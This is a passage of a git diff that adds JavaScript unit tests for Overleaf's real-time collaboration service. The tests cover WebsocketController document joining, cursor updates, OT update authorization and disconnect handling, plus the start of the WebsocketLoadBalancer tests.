+ .calledWith(this.project_id, this.doc_id, -1)
+ .should.equal(true)
+ })
+
+ it('should add permissions for the client to access the doc', function () {
+ return this.AuthorizationManager.addAccessToDoc
+ .calledWith(this.client, this.doc_id)
+ .should.equal(true)
+ })
+
+ it('should join the client to room for the doc_id', function () {
+ return this.RoomManager.joinDoc
+ .calledWith(this.client, this.doc_id)
+ .should.equal(true)
+ })
+
+ it('should call the callback with the lines, version, ranges and ops', function () {
+ return this.callback
+ .calledWith(null, this.doc_lines, this.version, this.ops, this.ranges)
+ .should.equal(true)
+ })
+
+ return it('should increment the join-doc metric', function () {
+ return this.metrics.inc.calledWith('editor.join-doc').should.equal(true)
+ })
+ })
+
+ describe('with a fromVersion', function () {
+ beforeEach(function () {
+ this.fromVersion = 40
+ return this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ 
this.fromVersion,
+ this.options,
+ this.callback
+ )
+ })
+
+ return it('should get the document from the DocumentUpdaterManager with fromVersion', function () {
+ return this.DocumentUpdaterManager.getDocument
+ .calledWith(this.project_id, this.doc_id, this.fromVersion)
+ .should.equal(true)
+ })
+ })
+
+ describe('with doclines that need escaping', function () {
+ beforeEach(function () {
+ this.doc_lines.push(['räksmörgås'])
+ return this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ -1,
+ this.options,
+ this.callback
+ )
+ })
+
+ return it('should call the callback with the escaped lines', function () {
+ const escapedLines = this.callback.args[0][1]
+ const escapedWord = escapedLines.pop()
+ escapedWord.should.equal('rÃ¤ksmÃ¶rgÃ¥s')
+ // Check that unescaping works
+ return decodeURIComponent(escape(escapedWord)).should.equal(
+ 'räksmörgås'
+ )
+ })
+ })
+
+ describe('with comments that need encoding', function () {
+ beforeEach(function () {
+ this.ranges.comments = [{ op: { c: 'räksmörgås' } }]
+ return this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ -1,
+ { encodeRanges: true },
+ this.callback
+ )
+ })
+
+ return it('should call the callback with the encoded comment', function () {
+ const encodedComments = this.callback.args[0][4]
+ const encodedComment = encodedComments.comments.pop()
+ const encodedCommentText = encodedComment.op.c
+ return encodedCommentText.should.equal('rÃ¤ksmÃ¶rgÃ¥s')
+ })
+ })
+
+ describe('with changes that need encoding', function () {
+ it('should call the callback with the encoded insert change', function () {
+ this.ranges.changes = [{ op: { i: 'räksmörgås' } }]
+ this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ -1,
+ { encodeRanges: true },
+ this.callback
+ )
+
+ const encodedChanges = this.callback.args[0][4]
+ const encodedChange = encodedChanges.changes.pop()
+ const encodedChangeText = encodedChange.op.i
+ return encodedChangeText.should.equal('rÃ¤ksmÃ¶rgÃ¥s')
+ })
+
+ return it('should call the callback with the encoded delete change', function () {
+ this.ranges.changes = [{ op: { d: 'räksmörgås' } }]
+ this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ -1,
+ { encodeRanges: true },
+ this.callback
+ )
+
+ const encodedChanges = this.callback.args[0][4]
+ const encodedChange = encodedChanges.changes.pop()
+ const encodedChangeText = encodedChange.op.d
+ return encodedChangeText.should.equal('rÃ¤ksmÃ¶rgÃ¥s')
+ })
+ })
+
+ describe('when not authorized', function () {
+ beforeEach(function () {
+ this.AuthorizationManager.assertClientCanViewProject = sinon
+ .stub()
+ .callsArgWith(1, (this.err = new Error('not authorized')))
+ return this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ -1,
+ this.options,
+ this.callback
+ )
+ })
+
+ it('should call the callback with an error', function () {
+ return this.callback
+ .calledWith(sinon.match({ message: 'not authorized' }))
+ .should.equal(true)
+ })
+
+ return it('should not call the DocumentUpdaterManager', function () {
+ return this.DocumentUpdaterManager.getDocument.called.should.equal(
+ false
+ )
+ })
+ })
+
+ describe('with a restricted client', function () {
+ beforeEach(function () {
+ this.ranges.comments = [{ op: { a: 1 } }, { op: { a: 2 } }]
+ this.client.ol_context.is_restricted_user = true
+ return this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ -1,
+ this.options,
+ this.callback
+ )
+ })
+
+ return it('should overwrite ranges.comments with an empty list', function () {
+ const ranges = 
this.callback.args[0][4] + return expect(ranges.comments).to.deep.equal([]) + }) + }) + + describe('when the client has disconnected', function () { + beforeEach(function () { + this.client.disconnected = true + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + it('should increment the editor.join-doc.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'immediately', + }) + ).to.equal(true) + }) + + return it('should not get the document', function () { + return expect(this.DocumentUpdaterManager.getDocument.called).to.equal( + false + ) + }) + }) + + describe('when the client disconnects while auth checks are running', function () { + beforeEach(function (done) { + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error() + ) + this.DocumentUpdaterManager.checkDocument = (projectId, docId, cb) => { + this.client.disconnected = true + cb() + } + + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + (...args) => { + this.callback(...args) + done() + } + ) + }) + + it('should call the callback with no details', function () { + expect(this.callback.called).to.equal(true) + expect(this.callback.args[0]).to.deep.equal([]) + }) + + it('should increment the editor.join-doc.disconnected metric with a status', function () { + expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'after-client-auth-check', + }) + ).to.equal(true) + }) + + it('should not get the document', function () { + expect(this.DocumentUpdaterManager.getDocument.called).to.equal(false) + }) + }) + + describe('when the client starts a parallel joinDoc request', function () { + beforeEach(function (done) { + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error() + ) + this.DocumentUpdaterManager.checkDocument = (projectId, docId, cb) => { + this.DocumentUpdaterManager.checkDocument = sinon.stub().yields() + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + {}, + () => {} + ) + cb() + } + + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + (...args) => { + this.callback(...args) + // make sure the other joinDoc request completed + setTimeout(done, 5) + } + ) + }) + + it('should call the callback with an error', function () { + expect(this.callback.called).to.equal(true) + expect(this.callback.args[0][0].message).to.equal( + 'joinLeaveEpoch mismatch' + ) + }) + + it('should get the document once (the parallel request wins)', function () { + expect(this.DocumentUpdaterManager.getDocument.callCount).to.equal(1) + }) + }) + + describe('when the client starts a parallel leaveDoc request', function () { + beforeEach(function (done) { + this.RoomManager.leaveDoc = sinon.stub() + + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error() + ) + this.DocumentUpdaterManager.checkDocument = (projectId, docId, cb) => { + this.WebsocketController.leaveDoc(this.client, this.doc_id, () => {}) + cb() + } + + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + (...args) => { + this.callback(...args) + done() + } + ) + }) + + it('should call the callback with an error', function () { + expect(this.callback.called).to.equal(true) + 
expect(this.callback.args[0][0].message).to.equal( + 'joinLeaveEpoch mismatch' + ) + }) + + it('should not get the document', function () { + expect(this.DocumentUpdaterManager.getDocument.called).to.equal(false) + }) + }) + + describe('when the client disconnects while RoomManager.joinDoc is running', function () { + beforeEach(function () { + this.RoomManager.joinDoc = (client, docId, cb) => { + this.client.disconnected = true + return cb() + } + + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + it('should increment the editor.join-doc.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'after-joining-room', + }) + ).to.equal(true) + }) + + return it('should not get the document', function () { + return expect(this.DocumentUpdaterManager.getDocument.called).to.equal( + false + ) + }) + }) + + return describe('when the client disconnects while DocumentUpdaterManager.getDocument is running', function () { + beforeEach(function () { + this.DocumentUpdaterManager.getDocument = ( + projectId, + docId, + fromVersion, + callback + ) => { + this.client.disconnected = true + return callback( + null, + this.doc_lines, + this.version, + this.ranges, + this.ops + ) + } + + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should increment the editor.join-doc.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'after-doc-updater-call', + }) + ).to.equal(true) + }) + }) + }) + + describe('leaveDoc', function () { + beforeEach(function () { + this.doc_id = 'doc-id-123' + this.client.ol_context.project_id = this.project_id + this.RoomManager.leaveDoc = sinon.stub() + return this.WebsocketController.leaveDoc( + this.client, + this.doc_id, + this.callback + ) + }) + + it('should inc the joinLeaveEpoch', function () { + expect(this.client.joinLeaveEpoch).to.equal(1) + }) + + it('should remove the client from the doc_id room', function () { + return this.RoomManager.leaveDoc + .calledWith(this.client, this.doc_id) + .should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should increment the leave-doc metric', function () { + return this.metrics.inc.calledWith('editor.leave-doc').should.equal(true) + }) + }) + + describe('getConnectedUsers', function () { + beforeEach(function () { + this.client.ol_context.project_id = this.project_id + this.users = ['mock', 'users'] + this.WebsocketLoadBalancer.emitToRoom = sinon.stub() + return (this.ConnectedUsersManager.getConnectedUsers = sinon + .stub() + .callsArgWith(1, null, this.users)) + }) + + describe('when authorized', function () { + beforeEach(function (done) { + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, null) + return this.WebsocketController.getConnectedUsers( + this.client, + (...args) => { + this.callback(...Array.from(args || [])) + return done() + } + ) + }) + + it('should check that the client is authorized to view the project', 
function () { + return this.AuthorizationManager.assertClientCanViewProject + .calledWith(this.client) + .should.equal(true) + }) + + it('should broadcast a request to update the client list', function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith(this.project_id, 'clientTracking.refresh') + .should.equal(true) + }) + + it('should get the connected users for the project', function () { + return this.ConnectedUsersManager.getConnectedUsers + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should return the users', function () { + return this.callback.calledWith(null, this.users).should.equal(true) + }) + + return it('should increment the get-connected-users metric', function () { + return this.metrics.inc + .calledWith('editor.get-connected-users') + .should.equal(true) + }) + }) + + describe('when not authorized', function () { + beforeEach(function () { + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, (this.err = new Error('not authorized'))) + return this.WebsocketController.getConnectedUsers( + this.client, + this.callback + ) + }) + + it('should not get the connected users for the project', function () { + return this.ConnectedUsersManager.getConnectedUsers.called.should.equal( + false + ) + }) + + return it('should return an error', function () { + return this.callback.calledWith(this.err).should.equal(true) + }) + }) + + describe('when restricted user', function () { + beforeEach(function () { + this.client.ol_context.is_restricted_user = true + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, null) + return this.WebsocketController.getConnectedUsers( + this.client, + this.callback + ) + }) + + it('should return an empty array of users', function () { + return this.callback.calledWith(null, []).should.equal(true) + }) + + return it('should not get the connected users for the project', function () { + return this.ConnectedUsersManager.getConnectedUsers.called.should.equal( + false + ) + }) + }) + + return describe('when the client has disconnected', function () { + beforeEach(function () { + this.client.disconnected = true + this.AuthorizationManager.assertClientCanViewProject = sinon.stub() + return this.WebsocketController.getConnectedUsers( + this.client, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should not check permissions', function () { + return expect( + this.AuthorizationManager.assertClientCanViewProject.called + ).to.equal(false) + }) + }) + }) + + describe('updateClientPosition', function () { + beforeEach(function () { + this.WebsocketLoadBalancer.emitToRoom = sinon.stub() + this.ConnectedUsersManager.updateUserPosition = sinon + .stub() + .callsArgAsync(4) + this.AuthorizationManager.assertClientCanViewProjectAndDoc = sinon + .stub() + .callsArgWith(2, null) + return (this.update = { + doc_id: (this.doc_id = 'doc-id-123'), + row: (this.row = 42), + column: (this.column = 37), + }) + }) + + describe('with a logged in user', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + first_name: (this.first_name = 'Douglas'), + last_name: (this.last_name = 'Adams'), + email: (this.email = 'joe@example.com'), + user_id: (this.user_id = 'user-id-123'), + } + + this.populatedCursorData = { + doc_id: this.doc_id, + id: this.client.publicId, + name: `${this.first_name} ${this.last_name}`, + 
row: this.row, + column: this.column, + email: this.email, + user_id: this.user_id, + } + this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + it("should send the update to the project room with the user's name", function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientUpdated', + this.populatedCursorData + ) + .should.equal(true) + }) + + it('should send the cursor data to the connected user manager', function (done) { + this.ConnectedUsersManager.updateUserPosition + .calledWith( + this.project_id, + this.client.publicId, + { + _id: this.user_id, + email: this.email, + first_name: this.first_name, + last_name: this.last_name, + }, + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + } + ) + .should.equal(true) + return done() + }) + + return it('should increment the update-client-position metric at 0.1 frequency', function () { + return this.metrics.inc + .calledWith('editor.update-client-position', 0.1) + .should.equal(true) + }) + }) + + describe('with a logged in user who has no last_name set', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + first_name: (this.first_name = 'Douglas'), + last_name: undefined, + email: (this.email = 'joe@example.com'), + user_id: (this.user_id = 'user-id-123'), + } + + this.populatedCursorData = { + doc_id: this.doc_id, + id: this.client.publicId, + name: `${this.first_name}`, + row: this.row, + column: this.column, + email: this.email, + user_id: this.user_id, + } + this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + it("should send the update to the project room with the user's name", function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientUpdated', + this.populatedCursorData + ) + .should.equal(true) + }) + + it('should send the cursor data to the connected user manager', function (done) { + this.ConnectedUsersManager.updateUserPosition + .calledWith( + this.project_id, + this.client.publicId, + { + _id: this.user_id, + email: this.email, + first_name: this.first_name, + last_name: undefined, + }, + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + } + ) + .should.equal(true) + return done() + }) + + return it('should increment the update-client-position metric at 0.1 frequency', function () { + return this.metrics.inc + .calledWith('editor.update-client-position', 0.1) + .should.equal(true) + }) + }) + + describe('with a logged in user who has no first_name set', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + first_name: undefined, + last_name: (this.last_name = 'Adams'), + email: (this.email = 'joe@example.com'), + user_id: (this.user_id = 'user-id-123'), + } + + this.populatedCursorData = { + doc_id: this.doc_id, + id: this.client.publicId, + name: `${this.last_name}`, + row: this.row, + column: this.column, + email: this.email, + user_id: this.user_id, + } + this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + it("should send the update to the project room with the user's name", function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientUpdated', + this.populatedCursorData + ) + .should.equal(true) + }) + + it('should send the cursor data to the connected user manager', function (done) 
{
+        this.ConnectedUsersManager.updateUserPosition
+          .calledWith(
+            this.project_id,
+            this.client.publicId,
+            {
+              _id: this.user_id,
+              email: this.email,
+              first_name: undefined,
+              last_name: this.last_name,
+            },
+            {
+              row: this.row,
+              column: this.column,
+              doc_id: this.doc_id,
+            }
+          )
+          .should.equal(true)
+        return done()
+      })
+
+      return it('should increment the update-client-position metric at 0.1 frequency', function () {
+        return this.metrics.inc
+          .calledWith('editor.update-client-position', 0.1)
+          .should.equal(true)
+      })
+    })
+
+    describe('with a logged in user who has no names set', function () {
+      beforeEach(function (done) {
+        this.client.ol_context = {
+          project_id: this.project_id,
+          first_name: undefined,
+          last_name: undefined,
+          email: (this.email = 'joe@example.com'),
+          user_id: (this.user_id = 'user-id-123'),
+        }
+        return this.WebsocketController.updateClientPosition(
+          this.client,
+          this.update,
+          done
+        )
+      })
+
+      return it('should send the update to the project room with no name', function () {
+        return this.WebsocketLoadBalancer.emitToRoom
+          .calledWith(this.project_id, 'clientTracking.clientUpdated', {
+            doc_id: this.doc_id,
+            id: this.client.publicId,
+            user_id: this.user_id,
+            name: '',
+            row: this.row,
+            column: this.column,
+            email: this.email,
+          })
+          .should.equal(true)
+      })
+    })
+
+    describe('with an anonymous user', function () {
+      beforeEach(function (done) {
+        this.client.ol_context = {
+          project_id: this.project_id,
+        }
+        return this.WebsocketController.updateClientPosition(
+          this.client,
+          this.update,
+          done
+        )
+      })
+
+      it('should send the update to the project room with no name', function () {
+        return this.WebsocketLoadBalancer.emitToRoom
+          .calledWith(this.project_id, 'clientTracking.clientUpdated', {
+            doc_id: this.doc_id,
+            id: this.client.publicId,
+            name: '',
+            row: this.row,
+            column: this.column,
+          })
+          .should.equal(true)
+      })
+
+      return it('should not send cursor data to the connected user manager', function (done) {
+        this.ConnectedUsersManager.updateUserPosition.called.should.equal(false)
+        return done()
+      })
+    })
+
+    return describe('when the client has disconnected', function () {
+      beforeEach(function (done) {
+        this.client.disconnected = true
+        this.AuthorizationManager.assertClientCanViewProjectAndDoc =
+          sinon.stub()
+        return this.WebsocketController.updateClientPosition(
+          this.client,
+          this.update,
+          (...args) => {
+            this.callback(...args)
+            done(args[0])
+          }
+        )
+      })
+
+      it('should call the callback with no details', function () {
+        return expect(this.callback.args[0]).to.deep.equal([])
+      })
+
+      return it('should not check permissions', function () {
+        return expect(
+          this.AuthorizationManager.assertClientCanViewProjectAndDoc.called
+        ).to.equal(false)
+      })
+    })
+  })
+
+  describe('applyOtUpdate', function () {
+    beforeEach(function () {
+      this.update = { op: { p: 12, t: 'foo' } }
+      this.client.ol_context.user_id = this.user_id
+      this.client.ol_context.project_id = this.project_id
+      this.WebsocketController._assertClientCanApplyUpdate = sinon
+        .stub()
+        .yields()
+      return (this.DocumentUpdaterManager.queueChange = sinon
+        .stub()
+        .callsArg(3))
+    })
+
+    describe('successfully', function () {
+      beforeEach(function () {
+        return this.WebsocketController.applyOtUpdate(
+          this.client,
+          this.doc_id,
+          this.update,
+          this.callback
+        )
+      })
+
+      it('should set the source of the update to the client id', function () {
+        return this.update.meta.source.should.equal(this.client.publicId)
+      })
+
+      it('should set the user_id of the update to the user id', function () {
+        return this.update.meta.user_id.should.equal(this.user_id)
+      })
+
+      it('should queue the update', function () {
+        return this.DocumentUpdaterManager.queueChange
+          .calledWith(this.project_id, this.doc_id, this.update)
+          .should.equal(true)
+      })
+
+      it('should call the callback', function () {
+        return this.callback.called.should.equal(true)
+      })
+
+      return it('should increment the doc updates', function () {
+        return this.metrics.inc
+          .calledWith('editor.doc-update')
+          .should.equal(true)
+      })
+    })
+
+    describe('unsuccessfully', function () {
+      beforeEach(function () {
+        this.client.disconnect = sinon.stub()
+        this.DocumentUpdaterManager.queueChange = sinon
+          .stub()
+          .callsArgWith(3, (this.error = new Error('Something went wrong')))
+        return this.WebsocketController.applyOtUpdate(
+          this.client,
+          this.doc_id,
+          this.update,
+          this.callback
+        )
+      })
+
+      it('should disconnect the client', function () {
+        return this.client.disconnect.called.should.equal(true)
+      })
+
+      it('should not log an error', function () {
+        return this.logger.error.called.should.equal(false)
+      })
+
+      return it('should call the callback with the error', function () {
+        return this.callback.calledWith(this.error).should.equal(true)
+      })
+    })
+
+    describe('when not authorized', function () {
+      beforeEach(function () {
+        this.client.disconnect = sinon.stub()
+        this.WebsocketController._assertClientCanApplyUpdate = sinon
+          .stub()
+          .yields((this.error = new Error('not authorized')))
+        return this.WebsocketController.applyOtUpdate(
+          this.client,
+          this.doc_id,
+          this.update,
+          this.callback
+        )
+      })
+
+      // This happens in a setTimeout to allow the client a chance to receive the error first.
+      // I'm not sure how to unit test this, but it is acceptance tested.
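+      // A hedged sketch of the deferred-disconnect pattern described above
+      // (the controller internals are not shown in this test file, so the
+      // exact shape is an assumption):
+      //
+      //   callback(error) // let the client receive the error first...
+      //   setTimeout(() => client.disconnect(), 100) // ...then drop it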
+      // it "should disconnect the client", ->
+      //   @client.disconnect.called.should.equal true
+
+      it('should not log a warning', function () {
+        return this.logger.warn.called.should.equal(false)
+      })
+
+      return it('should call the callback with the error', function () {
+        return this.callback.calledWith(this.error).should.equal(true)
+      })
+    })
+
+    return describe('update_too_large', function () {
+      beforeEach(function (done) {
+        this.client.disconnect = sinon.stub()
+        this.client.emit = sinon.stub()
+        this.client.ol_context.user_id = this.user_id
+        this.client.ol_context.project_id = this.project_id
+        const error = new UpdateTooLargeError(7372835)
+        this.DocumentUpdaterManager.queueChange = sinon
+          .stub()
+          .callsArgWith(3, error)
+        this.WebsocketController.applyOtUpdate(
+          this.client,
+          this.doc_id,
+          this.update,
+          this.callback
+        )
+        return setTimeout(() => done(), 1)
+      })
+
+      it('should call the callback with no error', function () {
+        this.callback.called.should.equal(true)
+        return this.callback.args[0].should.deep.equal([])
+      })
+
+      it('should log a warning with the size and context', function () {
+        this.logger.warn.called.should.equal(true)
+        return this.logger.warn.args[0].should.deep.equal([
+          {
+            userId: this.user_id,
+            projectId: this.project_id,
+            docId: this.doc_id,
+            updateSize: 7372835,
+          },
+          'update is too large',
+        ])
+      })
+
+      describe('after 100ms', function () {
+        beforeEach(function (done) {
+          return setTimeout(done, 100)
+        })
+
+        it('should send an otUpdateError to the client', function () {
+          return this.client.emit.calledWith('otUpdateError').should.equal(true)
+        })
+
+        return it('should disconnect the client', function () {
+          return this.client.disconnect.called.should.equal(true)
+        })
+      })
+
+      return describe('when the client disconnects during the next 100ms', function () {
+        beforeEach(function (done) {
+          this.client.disconnected = true
+          return setTimeout(done, 100)
+        })
+
+        it('should not send an otUpdateError to the client', function () {
+          return this.client.emit
+            .calledWith('otUpdateError')
+            .should.equal(false)
+        })
+
+        it('should not disconnect the client', function () {
+          return this.client.disconnect.called.should.equal(false)
+        })
+
+        return it('should increment the editor.doc-update.disconnected metric with a status', function () {
+          return expect(
+            this.metrics.inc.calledWith('editor.doc-update.disconnected', 1, {
+              status: 'at-otUpdateError',
+            })
+          ).to.equal(true)
+        })
+      })
+    })
+  })
+
+  return describe('_assertClientCanApplyUpdate', function () {
+    beforeEach(function () {
+      this.edit_update = {
+        op: [
+          { i: 'foo', p: 42 },
+          { c: 'bar', p: 132 },
+        ],
+      } // comments may still be in an edit op
+      this.comment_update = { op: [{ c: 'bar', p: 132 }] }
+      this.AuthorizationManager.assertClientCanEditProjectAndDoc = sinon.stub()
+      this.AuthorizationManager.assertClientCanReviewProjectAndDoc =
+        sinon.stub()
+      return (this.AuthorizationManager.assertClientCanViewProjectAndDoc =
+        sinon.stub())
+    })
+
+    describe('with a read-write client', function () {
+      return it('should return successfully', function (done) {
+        this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields(null)
+        return this.WebsocketController._assertClientCanApplyUpdate(
+          this.client,
+          this.doc_id,
+          this.edit_update,
+          error => {
+            expect(error).to.be.null
+            return done()
+          }
+        )
+      })
+    })
+
+    describe('with a read-only client and an edit op', function () {
+      return it('should return an error', function (done) {
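+        // For reference, an informal sketch of the sharejs-style op
+        // components used in these fixtures (the component meanings are
+        // assumptions, not defined in this file):
+        //   { i: 'foo', p: 42 }  -- insert 'foo' at position 42
+        //   { d: 'foo', p: 42 }  -- delete 'foo' at position 42
+        //   { c: 'bar', p: 132 } -- comment on 'bar' at position 132
+        // Any op containing an insert/delete component counts as an edit,
+        // so a read-only client must be rejected here.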
this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + this.edit_update, + error => { + expect(error.message).to.equal('not authorized') + return done() + } + ) + }) + }) + + describe('with a read-only client and a comment op', function () { + return it('should return successfully', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + this.comment_update, + error => { + expect(error).to.be.null + return done() + } + ) + }) + }) + + describe('with a totally unauthorized client', function () { + return it('should return an error', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error('not authorized') + ) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + this.comment_update, + error => { + expect(error.message).to.equal('not authorized') + return done() + } + ) + }) + }) + + describe('with a review client', function () { + it('op with tc should succeed', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + this.AuthorizationManager.assertClientCanReviewProjectAndDoc.yields( + null + ) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + { op: [{ p: 10, i: 'a' }], meta: { tc: '123456' } }, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + return it('op without tc should fail', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + this.AuthorizationManager.assertClientCanReviewProjectAndDoc.yields( + null + ) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + { op: [{ p: 10, i: 'a' }] }, + error => { + expect(error.message).to.equal('not authorized') + return done() + } + ) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/WebsocketLoadBalancerTests.js b/services/real-time/test/unit/js/WebsocketLoadBalancerTests.js new file mode 100644 index 0000000..574ab65 --- /dev/null +++ b/services/real-time/test/unit/js/WebsocketLoadBalancerTests.js @@ -0,0 +1,514 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
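+// These tests cover the Redis fan-out path: emitToRoom publishes a JSON
+// envelope on the 'editor-events' channel and _processEditorEvent delivers
+// it to the connected clients. A minimal sketch of the flow exercised below
+// (stub names as wired up in the beforeEach; values from the outer setup):
+//
+//   WebsocketLoadBalancer.emitToRoom(roomId, message, ...payload)
+//   // -> ChannelManager.publish(rclient, 'editor-events', roomId,
+//   //      JSON.stringify({ room_id: 'room-id', message: 'otUpdateApplied',
+//   //        payload: ['argument one', 42] }))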
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const SandboxedModule = require('sandboxed-module')
+const sinon = require('sinon')
+const expect = require('chai').expect
+const modulePath = require('node:path').join(
+  __dirname,
+  '../../../app/js/WebsocketLoadBalancer'
+)
+
+describe('WebsocketLoadBalancer', function () {
+  beforeEach(function () {
+    this.rclient = {}
+    this.RoomEvents = { on: sinon.stub() }
+    this.WebsocketLoadBalancer = SandboxedModule.require(modulePath, {
+      requires: {
+        '@overleaf/settings': (this.Settings = { redis: {} }),
+        './RedisClientManager': {
+          createClientList: () => [],
+        },
+        './SafeJsonParse': (this.SafeJsonParse = {
+          parse: (data, cb) => cb(null, JSON.parse(data)),
+        }),
+        './EventLogger': { checkEventOrder: sinon.stub() },
+        './HealthCheckManager': { check: sinon.stub() },
+        './RoomManager': (this.RoomManager = {
+          eventSource: sinon.stub().returns(this.RoomEvents),
+        }),
+        './ChannelManager': (this.ChannelManager = { publish: sinon.stub() }),
+        './ConnectedUsersManager': (this.ConnectedUsersManager = {
+          refreshClient: sinon.stub(),
+        }),
+      },
+    })
+    this.io = {}
+    this.WebsocketLoadBalancer.rclientPubList = [{ publish: sinon.stub() }]
+    this.WebsocketLoadBalancer.rclientSubList = [
+      {
+        subscribe: sinon.stub(),
+        on: sinon.stub(),
+      },
+    ]
+
+    this.room_id = 'room-id'
+    this.message = 'otUpdateApplied'
+    return (this.payload = ['argument one', 42])
+  })
+
+  describe('shouldDisconnectClient', function () {
+    it('should return false for general messages', function () {
+      const client = {
+        ol_context: { user_id: 'abcd' },
+      }
+      const message = {
+        message: 'someNiceMessage',
+        payload: [{ data: 'whatever' }],
+      }
+      expect(
+        this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+      ).to.equal(false)
+    })
+
+    describe('collaborator access level changed', function () {
+      const messageName = 'project:collaboratorAccessLevel:changed'
+      const client = {
+        ol_context: { user_id: 'abcd' },
+      }
+      it('should return true if the user id matches', function () {
+        const message = {
+          message: messageName,
+          payload: [
+            {
+              userId: 'abcd',
+            },
+          ],
+        }
+        expect(
+          this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+        ).to.equal(true)
+      })
+      it('should return false if the user id does not match', function () {
+        const message = {
+          message: messageName,
+          payload: [
+            {
+              userId: 'xyz',
+            },
+          ],
+        }
+        expect(
+          this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+        ).to.equal(false)
+      })
+    })
+
+    describe('user removed from project', function () {
+      const messageName = 'userRemovedFromProject'
+      const client = {
+        ol_context: { user_id: 'abcd' },
+      }
+      it('should return false, when the user_id does not match', function () {
+        const message = {
+          message: messageName,
+          payload: ['xyz'],
+        }
+        expect(
+          this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+        ).to.equal(false)
+      })
+
+      it('should return true, if the user_id matches', function () {
+        const message = {
+          message: messageName,
+          payload: [`${client.ol_context.user_id}`],
+        }
+        expect(
+          this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+        ).to.equal(true)
+      })
+    })
+
+    describe('link-sharing turned off', function () {
+      const messageName = 'project:publicAccessLevel:changed'
+
+      describe('when the new access level is set to "private"', function () {
+        const message = {
+          message: messageName,
